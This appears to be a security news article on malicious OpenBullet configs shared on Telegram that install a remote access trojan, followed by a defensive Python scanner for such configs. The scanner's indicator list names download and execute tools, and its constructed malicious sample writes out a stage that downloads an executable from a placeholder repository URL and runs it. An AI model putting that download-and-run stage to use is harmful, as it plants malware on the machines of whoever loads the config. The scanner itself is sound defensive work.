The Hacker News reports that more capable threat actors have been distributing malicious configuration files for OpenBullet, an open-source pen-testing tool widely used to automate credential stuffing, to deliver a remote access trojan to their less sophisticated peers.
According to a Kasada report, the malicious OpenBullet configs fetch the Rust-based Ocean dropper from a GitHub repository. OpenBullet configs are scripts rather than plain request templates, so a crafted config can run code on the operator's own machine instead of only driving HTTP requests against a target. Ocean then pulls the Python-based Patent malware from the same repository, which runs a remote access trojan capable of capturing screenshots, killing tasks, exfiltrating cryptocurrency wallet information, and stealing passwords and cookies saved by Chromium-based browsers. The RAT can also steal cryptocurrency assets outright.
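A practical check that follows from the above: before loading a config obtained from a forum or Telegram channel, scan it for download-and-execute primitives that a credential-testing config has no reason to contain. The scanner below is an added example written for this article; it is not code from Kasada, OpenBullet, or the malware described. Its indicator list, the assumed .opk bundle layout (a ZIP containing metadata.json and script.loli), the two sample configs and the example/repo URL in them are all constructed for illustration.

```python
"""Heuristic scanner for OpenBullet configs that embed download-and-execute code.

Added example, not the tool's or the report's own code. Assumptions:
- .opk bundles are ZIP archives whose members (metadata.json, script.loli, ...)
  are scanned individually; any other file is treated as UTF-8 text
- the indicator regexes are a starting point to be tuned by the analyst
"""
import io
import re
import zipfile

# Constructed indicator list (hypothetical): things a config that only drives
# HTTP requests and key checks should never need.
INDICATORS = {
    "download": re.compile(
        r"WebClient|HttpClient|DownloadFile|DownloadString|Invoke-WebRequest|curl\s",
        re.I),
    "execute": re.compile(
        r"Process\.Start|Assembly\.Load|powershell|cmd\.exe|/bin/sh", re.I),
    "raw_repo_url": re.compile(
        r"https?://(raw\.githubusercontent\.com|github\.com/[^/\s]+/[^/\s]+/(raw|releases))",
        re.I),
}


def scan_text(text):
    """Return (line_number, indicator_name, stripped_line) for every hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


def scan_config_bytes(data, filename):
    """Scan a config file's bytes; .opk bundles are unpacked member by member."""
    if filename.lower().endswith(".opk") and zipfile.is_zipfile(io.BytesIO(data)):
        findings = []
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                text = zf.read(member).decode("utf-8", errors="replace")
                findings.extend((member, *hit) for hit in scan_text(text))
        return findings
    text = data.decode("utf-8", errors="replace")
    return [(filename, *hit) for hit in scan_text(text)]


def verdict(findings):
    """Downloading plus executing in one config is the dropper pattern."""
    kinds = {f[2] for f in findings}
    if "execute" in kinds and ("download" in kinds or "raw_repo_url" in kinds):
        return "download-and-execute"
    return "suspicious" if kinds else "clean"


def build_opk(script):
    """Assemble an in-memory .opk bundle (constructed test fixture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("metadata.json", '{"Name": "sample"}')
        zf.writestr("script.loli", script)
    return buf.getvalue()


# Constructed sample: an ordinary login-check config.
BENIGN_SCRIPT = """BLOCK:HttpRequest
  url = "https://example.com/login"
  method = POST
  content = "user=<input.USER>&pass=<input.PASS>"
ENDBLOCK
BLOCK:KeyCheck
  KEYCHAIN SUCCESS OR
    STRINGKEY @data.SOURCE Contains "Welcome"
ENDBLOCK
"""

# Constructed sample: the same config with an embedded stage that fetches a
# binary from a repository URL and runs it. The URL is a placeholder.
MALICIOUS_SCRIPT = BENIGN_SCRIPT + """
var wc = new System.Net.WebClient();
var path = System.IO.Path.GetTempPath() + "svc.exe";
wc.DownloadFile("https://raw.githubusercontent.com/example/repo/main/svc.exe", path);
System.Diagnostics.Process.Start(path);
"""

if __name__ == "__main__":
    for name, script in (("benign.opk", BENIGN_SCRIPT), ("shared.opk", MALICIOUS_SCRIPT)):
        hits = scan_config_bytes(build_opk(script), name)
        print(name, verdict(hits))
        for member, lineno, kind, line in hits:
            print(f"  {member}:{lineno} [{kind}] {line}")
```

Run it on a downloaded .opk or plain .loli file by reading the bytes and passing them to scan_config_bytes; a "download-and-execute" verdict means the config stages something on the operator's host and should not be loaded. The regexes are deliberately broad and line-based, so expect some noise on legitimate configs that call out to helper APIs; the point is to force a look at any config that both fetches and launches something.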
"The distribution of the malicious OpenBullet configs within Telegram is a novel infection vector, likely targeting these criminal communities due to their frequent use of cryptocurrencies. ... This presents an opportunity for attackers to shape their collection to a specific target group and obtain other members' funds, accounts, or access. As the old saying goes, there is no honor amongst thieves," said the report.